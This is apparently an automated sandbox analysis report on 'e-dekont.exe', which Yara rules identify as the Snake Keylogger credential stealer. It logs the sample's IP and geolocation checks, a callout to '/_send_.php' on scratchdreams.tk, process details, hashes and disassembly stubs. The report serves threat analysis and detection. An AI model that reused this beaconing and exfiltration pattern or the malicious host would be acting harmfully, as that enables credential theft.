                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.105.36</body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      4 | 192.168.2.4 | 49744 | 158.101.44.242 | 80 | 7424 | C:\Users\user\Desktop\e-dekont.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Apr 24, 2024 07:09:13.042287111 CEST | 151 | OUT | GET / HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                      Host: checkip.dyndns.org
                                                      Connection: Keep-Alive
                                                      Apr 24, 2024 07:09:13.208477020 CEST | 274 | IN | HTTP/1.1 200 OK
                                                      Date: Wed, 24 Apr 2024 05:09:13 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 105
                                                      Connection: keep-alive
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.105.36</body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      5 | 192.168.2.4 | 49746 | 158.101.44.242 | 80 | 7424 | C:\Users\user\Desktop\e-dekont.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Apr 24, 2024 07:09:14.085747957 CEST | 151 | OUT | GET / HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                      Host: checkip.dyndns.org
                                                      Connection: Keep-Alive
                                                      Apr 24, 2024 07:09:14.252933025 CEST | 274 | IN | HTTP/1.1 200 OK
                                                      Date: Wed, 24 Apr 2024 05:09:14 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 105
                                                      Connection: keep-alive
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.105.36</body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      6 | 192.168.2.4 | 49748 | 158.101.44.242 | 80 | 7424 | C:\Users\user\Desktop\e-dekont.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Apr 24, 2024 07:09:15.131479025 CEST | 151 | OUT | GET / HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                      Host: checkip.dyndns.org
                                                      Connection: Keep-Alive
                                                      Apr 24, 2024 07:09:15.298448086 CEST | 274 | IN | HTTP/1.1 200 OK
                                                      Date: Wed, 24 Apr 2024 05:09:15 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 105
                                                      Connection: keep-alive
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.105.36</body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      0 | 192.168.2.4 | 49734 | 104.21.67.152 | 443 | 7424 | C:\Users\user\Desktop\e-dekont.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-04-24 05:09:08 UTC | 86 | OUT | GET /xml/154.16.105.36 HTTP/1.1
                                                      Host: reallyfreegeoip.org
                                                      Connection: Keep-Alive
                                                      2024-04-24 05:09:08 UTC | 695 | IN | HTTP/1.1 200 OK
                                                      Date: Wed, 24 Apr 2024 05:09:08 GMT
                                                      Content-Type: application/xml
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      access-control-allow-origin: *
                                                      vary: Accept-Encoding
                                                      Cache-Control: max-age=86400
                                                      CF-Cache-Status: MISS
                                                      Last-Modified: Wed, 24 Apr 2024 05:09:08 GMT
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mZZ%2Fsp4D3JME0r5KtWFwo7mhSbPqhWRcrz%2B%2FZGTOlRx7p07T4phsD2pZV6XXFKfUEjzfeoL4MjIQQUdNLj4tnbUSVrXhIuHtSi9UZgX44zaxggdIx2RX8NcS0u7lyBnwzn5BXwnK"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 879394582ea62adb-LAX
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-04-24 05:09:08 UTC | 368 | IN
                                                      Data Ascii: 169<Response><IP>154.16.105.36</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>AZ</RegionCode><RegionName>Arizona</RegionName><City>Phoenix</City><ZipCode>85004</ZipCode><TimeZone>America/Phoenix</Tim
                                                      2024-04-24 05:09:08 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      1 | 192.168.2.4 | 49735 | 104.21.67.152 | 443 | 7424 | C:\Users\user\Desktop\e-dekont.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-04-24 05:09:09 UTC | 62 | OUT | GET /xml/154.16.105.36 HTTP/1.1
                                                      Host: reallyfreegeoip.org
                                                      2024-04-24 05:09:09 UTC | 698 | IN | HTTP/1.1 200 OK
                                                      Date: Wed, 24 Apr 2024 05:09:09 GMT
                                                      Content-Type: application/xml
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      access-control-allow-origin: *
                                                      vary: Accept-Encoding
                                                      Cache-Control: max-age=86400
                                                      CF-Cache-Status: HIT
                                                      Age: 1
                                                      Last-Modified: Wed, 24 Apr 2024 05:09:08 GMT
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JzMWq6142JWdoHOpmvjc6ZXQr7UXowxTSe3MPpVqpfUWroef1jqmO3HDaSfjP5aCOLFdarQvIq6Enq7dKqBsUgdNC%2Bw1u5fnItZ3krnS5eJHuEajT1IIe6Tfra2x3u92FRp82V3o"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8793945f58f63235-LAX
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-04-24 05:09:09 UTC | 368 | IN
                                                      Data Ascii: 169<Response><IP>154.16.105.36</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>AZ</RegionCode><RegionName>Arizona</RegionName><City>Phoenix</City><ZipCode>85004</ZipCode><TimeZone>America/Phoenix</Tim
                                                      2024-04-24 05:09:09 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      2 | 192.168.2.4 | 49738 | 104.21.67.152 | 443 | 7424 | C:\Users\user\Desktop\e-dekont.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-04-24 05:09:10 UTC | 62 | OUT | GET /xml/154.16.105.36 HTTP/1.1
                                                      Host: reallyfreegeoip.org
                                                      2024-04-24 05:09:10 UTC | 704 | IN | HTTP/1.1 200 OK
                                                      Date: Wed, 24 Apr 2024 05:09:10 GMT
                                                      Content-Type: application/xml
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      access-control-allow-origin: *
                                                      vary: Accept-Encoding
                                                      Cache-Control: max-age=86400
                                                      CF-Cache-Status: HIT
                                                      Age: 2
                                                      Last-Modified: Wed, 24 Apr 2024 05:09:08 GMT
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BXK2qdlE6pLnwWIo0Dh7EKG5%2FrhxUvgXYWilcAhnlU%2FBzjmc%2BV%2BhXnrfKHS0MuzxF1upH32pe2ILq81gMdaOUt1AJSvgdgqPtFZmrbEv9t502qb35YXZzi4nFjXUXKiYVBC8RaVi"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 87939465d9330faf-LAX
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-04-24 05:09:10 UTC | 368 | IN
                                                      Data Ascii: 169<Response><IP>154.16.105.36</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>AZ</RegionCode><RegionName>Arizona</RegionName><City>Phoenix</City><ZipCode>85004</ZipCode><TimeZone>America/Phoenix</Tim
                                                      2024-04-24 05:09:10 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      3 | 192.168.2.4 | 49741 | 104.21.67.152 | 443 | 7424 | C:\Users\user\Desktop\e-dekont.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-04-24 05:09:11 UTC | 86 | OUT | GET /xml/154.16.105.36 HTTP/1.1
                                                      Host: reallyfreegeoip.org
                                                      Connection: Keep-Alive
                                                      2024-04-24 05:09:11 UTC | 704 | IN | HTTP/1.1 200 OK
                                                      Date: Wed, 24 Apr 2024 05:09:11 GMT
                                                      Content-Type: application/xml
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      access-control-allow-origin: *
                                                      vary: Accept-Encoding
                                                      Cache-Control: max-age=86400
                                                      CF-Cache-Status: HIT
                                                      Age: 3
                                                      Last-Modified: Wed, 24 Apr 2024 05:09:08 GMT
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9sB1w8rDjW4RyRB8jh9z6N9FnVVNTLdJGwK8O4ID2tqM%2BA2cAxnISYJWi41scyCnswAEm5zJzvSwYSUcv%2B%2FUE3a%2FosIOEZhuJvrG7aVTN8aGye4lSoLdF2Wg31gMEC4myWpQn0lr"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8793946c5f9469bc-LAX
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-04-24 05:09:11 UTC | 368 | IN
                                                      Data Ascii: 169<Response><IP>154.16.105.36</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>AZ</RegionCode><RegionName>Arizona</RegionName><City>Phoenix</City><ZipCode>85004</ZipCode><TimeZone>America/Phoenix</Tim
                                                      2024-04-24 05:09:11 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      4 | 192.168.2.4 | 49743 | 104.21.67.152 | 443 | 7424 | C:\Users\user\Desktop\e-dekont.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-04-24 05:09:12 UTC | 86 | OUT | GET /xml/154.16.105.36 HTTP/1.1
                                                      Host: reallyfreegeoip.org
                                                      Connection: Keep-Alive
                                                      2024-04-24 05:09:12 UTC | 698 | IN | HTTP/1.1 200 OK
                                                      Date: Wed, 24 Apr 2024 05:09:12 GMT
                                                      Content-Type: application/xml
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      access-control-allow-origin: *
                                                      vary: Accept-Encoding
                                                      Cache-Control: max-age=86400
                                                      CF-Cache-Status: HIT
                                                      Age: 4
                                                      Last-Modified: Wed, 24 Apr 2024 05:09:08 GMT
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dTCNb449sjEQMl6U92srMaMoT%2F3RWMtil6knwmf6gaLNdWSGsvCpbnJAl3O8krPL20TjFZ6dNRb3YE7uigEgtUvFC67UR6N4iQz2wHelLXG5R11t6fSDTHYzz0sqRkyFcyDeTh8f"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 87939472df6edbd9-LAX
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-04-24 05:09:12 UTC | 368 | IN
                                                      Data Ascii: 169<Response><IP>154.16.105.36</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>AZ</RegionCode><RegionName>Arizona</RegionName><City>Phoenix</City><ZipCode>85004</ZipCode><TimeZone>America/Phoenix</Tim
                                                      2024-04-24 05:09:12 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      5 | 192.168.2.4 | 49745 | 104.21.67.152 | 443 | 7424 | C:\Users\user\Desktop\e-dekont.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-04-24 05:09:13 UTC | 86 | OUT | GET /xml/154.16.105.36 HTTP/1.1
                                                      Host: reallyfreegeoip.org
                                                      Connection: Keep-Alive
                                                      2024-04-24 05:09:13 UTC | 704 | IN | HTTP/1.1 200 OK
                                                      Date: Wed, 24 Apr 2024 05:09:13 GMT
                                                      Content-Type: application/xml
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      access-control-allow-origin: *
                                                      vary: Accept-Encoding
                                                      Cache-Control: max-age=86400
                                                      CF-Cache-Status: HIT
                                                      Age: 5
                                                      Last-Modified: Wed, 24 Apr 2024 05:09:08 GMT
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pAUkryMT8M7TV3pRSXux3A0DTBVTT8xluUq0qTz9PTIGRzU8AdOwFOtkRL57T1ELNoZdONFSYrhRS3x4zvtvd2%2FiuZRNgm7v29E%2Fvq8%2B8x2h2OYWmVFUfBiECV1%2BwxjhEvujLFvo"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 879394795c0e2b5b-LAX
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-04-24 05:09:13 UTC | 368 | IN
                                                      Data Ascii: 169<Response><IP>154.16.105.36</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>AZ</RegionCode><RegionName>Arizona</RegionName><City>Phoenix</City><ZipCode>85004</ZipCode><TimeZone>America/Phoenix</Tim
                                                      2024-04-24 05:09:13 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      6 | 192.168.2.4 | 49747 | 104.21.67.152 | 443 | 7424 | C:\Users\user\Desktop\e-dekont.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-04-24 05:09:14 UTC | 86 | OUT | GET /xml/154.16.105.36 HTTP/1.1
                                                      Host: reallyfreegeoip.org
                                                      Connection: Keep-Alive
                                                      2024-04-24 05:09:14 UTC | 712 | IN | HTTP/1.1 200 OK
                                                      Date: Wed, 24 Apr 2024 05:09:14 GMT
                                                      Content-Type: application/xml
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      access-control-allow-origin: *
                                                      vary: Accept-Encoding
                                                      Cache-Control: max-age=86400
                                                      CF-Cache-Status: HIT
                                                      Age: 6
                                                      Last-Modified: Wed, 24 Apr 2024 05:09:08 GMT
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ryjsHlHih0Yzm%2F%2Fot0dFn1bvfU6DT%2FQcXPDmlu6DJfT4V7v%2BeoQPFcHXgEpnozrpyUG72%2Bru%2FgDehJf4f1bmzPn1qDTnXVnVN3yzeMS3smjJBxEoVcv%2FoCZbk4JCYx7%2BCFo4vY3b"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8793947fe9602ac7-LAX
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-04-24 05:09:14 UTC | 368 | IN | Data Ascii: 169<Response><IP>154.16.105.36</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>AZ</RegionCode><RegionName>Arizona</RegionName><City>Phoenix</City><ZipCode>85004</ZipCode><TimeZone>America/Phoenix</Tim
                                                      2024-04-24 05:09:14 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      7 | 192.168.2.4 | 49749 | 104.21.67.152 | 443 | 7424 | C:\Users\user\Desktop\e-dekont.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-04-24 05:09:15 UTC | 86 | OUT | GET /xml/154.16.105.36 HTTP/1.1
                                                      Host: reallyfreegeoip.org
                                                      Connection: Keep-Alive
                                                      2024-04-24 05:09:16 UTC | 704 | IN | HTTP/1.1 200 OK
                                                      Date: Wed, 24 Apr 2024 05:09:15 GMT
                                                      Content-Type: application/xml
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      access-control-allow-origin: *
                                                      vary: Accept-Encoding
                                                      Cache-Control: max-age=86400
                                                      CF-Cache-Status: HIT
                                                      Age: 7
                                                      Last-Modified: Wed, 24 Apr 2024 05:09:08 GMT
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1e%2BXvXiKExUCRvnQSD0MaZ%2BpggV19MtvCCCYVKUmnIQy9BgkOLur%2BsFq86%2FGfss6577uPqown2nLapAtKjNl7PqvM7MaxJKdgx2tXcNyM02xxRKJ5pRgvIQwtiobLdETUfgQ8Tpe"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 879394867d0c0fe0-LAX
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-04-24 05:09:16 UTC | 368 | IN | Data Ascii: 169<Response><IP>154.16.105.36</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>AZ</RegionCode><RegionName>Arizona</RegionName><City>Phoenix</City><ZipCode>85004</ZipCode><TimeZone>America/Phoenix</Tim
                                                      2024-04-24 05:09:16 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      8 | 192.168.2.4 | 49750 | 104.21.27.85 | 443 | 7424 | C:\Users\user\Desktop\e-dekont.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-04-24 05:09:18 UTC | 79 | OUT | GET /_send_.php?TS HTTP/1.1
                                                      Host: scratchdreams.tk
                                                      Connection: Keep-Alive
                                                      2024-04-24 05:09:57 UTC | 737 | IN | HTTP/1.1 522
                                                      Date: Wed, 24 Apr 2024 05:09:57 GMT
                                                      Content-Type: text/plain; charset=UTF-8
                                                      Content-Length: 15
                                                      Connection: close
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iL2Fj964QJoPtXX40kNuYCCMu6styWTSmwqm8uJmH89HvDF2Yl4FhGiX5CSpjujNwmVuTbxTDEwLEN0UpruCMHlrTQ3tPFH%2Fw2MITuw%2BXBZ28B63ImH1sjAh%2Bs%2BMCfatgGcT"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      X-Frame-Options: SAMEORIGIN
                                                      Referrer-Policy: same-origin
                                                      Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                      Server: cloudflare
                                                      CF-RAY: 879394966dbf08ea-LAX
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-04-24 05:09:57 UTC | 15 | IN | Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32
                                                      Data Ascii: error code: 522


                                                      Target ID:0
                                                      Start time:07:09:03
                                                      Start date:24/04/2024
                                                      Path:C:\Users\user\Desktop\e-dekont.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\e-dekont.exe"
                                                      Imagebase:0x700000
                                                      File size:854'528 bytes
                                                      MD5 hash:FF53D6A04EA8618890F7A81E31BD8A22
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1662409618.00000000044BE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.1662409618.00000000044BE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1662409618.00000000044BE000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.1662409618.00000000044BE000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:2
                                                      Start time:07:09:05
                                                      Start date:24/04/2024
                                                      Path:C:\Users\user\Desktop\e-dekont.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\e-dekont.exe"
                                                      Imagebase:0xb70000
                                                      File size:854'528 bytes
                                                      MD5 hash:FF53D6A04EA8618890F7A81E31BD8A22
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4088425866.0000000003160000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4086321706.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4086321706.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4086321706.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000002.00000002.4086321706.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4088425866.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:false

                                                        Execution Graph

                                                        Execution Coverage:10.6%
                                                        Dynamic/Decrypted Code Coverage:98.8%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:254
                                                        Total number of Limit Nodes:13

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Te^q$Te^q$)"
                                                        • API String ID: 0-4031938444
                                                        • Opcode ID: 7fe38c786a11313152ffc422937dbbdd7dd6661cdec4a3c7903ca0eed6e5ec85
                                                        • Instruction ID: 5d113280b506c5ab73b9e14c678793802c519998bc11a8b3fc5d27aa1285abf0
                                                        • Opcode Fuzzy Hash: 7fe38c786a11313152ffc422937dbbdd7dd6661cdec4a3c7903ca0eed6e5ec85
                                                        • Instruction Fuzzy Hash: 51A125B1E14209CFDB08CFA9D8806DEFBB2FF89311F24912AD419AB355D7345A46CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Te^q$Te^q$)"
                                                        • API String ID: 0-4031938444
                                                        • Opcode ID: ae8a154ed9887b0560189cba0ccf51010a771cfe0e982f7dde7351ea4dbee00a
                                                        • Instruction ID: 9d875688859445e66b3a5a2c3bdf1a49625356ab9a64fdc78acbdf95b30bf459
                                                        • Opcode Fuzzy Hash: ae8a154ed9887b0560189cba0ccf51010a771cfe0e982f7dde7351ea4dbee00a
                                                        • Instruction Fuzzy Hash: 3581C4B4E00209CFDB48CFAAC984AAEFBB2FF89310F14942AD519AB354D7349945CF54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: tIh
                                                        • API String ID: 0-443931868
                                                        • Opcode ID: f9fa82bc4a5c3728c54ee4e60ace3c5d295939cb7957e1a14e07283d3643a3e8
                                                        • Instruction ID: 1f0a17b9b1161b3474da231e797047b3dcdb9d43e14c7829548c51665e7ec9bc
                                                        • Opcode Fuzzy Hash: f9fa82bc4a5c3728c54ee4e60ace3c5d295939cb7957e1a14e07283d3643a3e8
                                                        • Instruction Fuzzy Hash: 5BF19DB1A1424ACFDB04CFE9D4808EEFBB1FF89351B50A566D515AB202D7349A82CFD4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: tIh
                                                        • API String ID: 0-443931868
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1664124841.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5060000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1664124841.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5060000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666345195.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7610000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666345195.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7610000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666345195.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7610000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
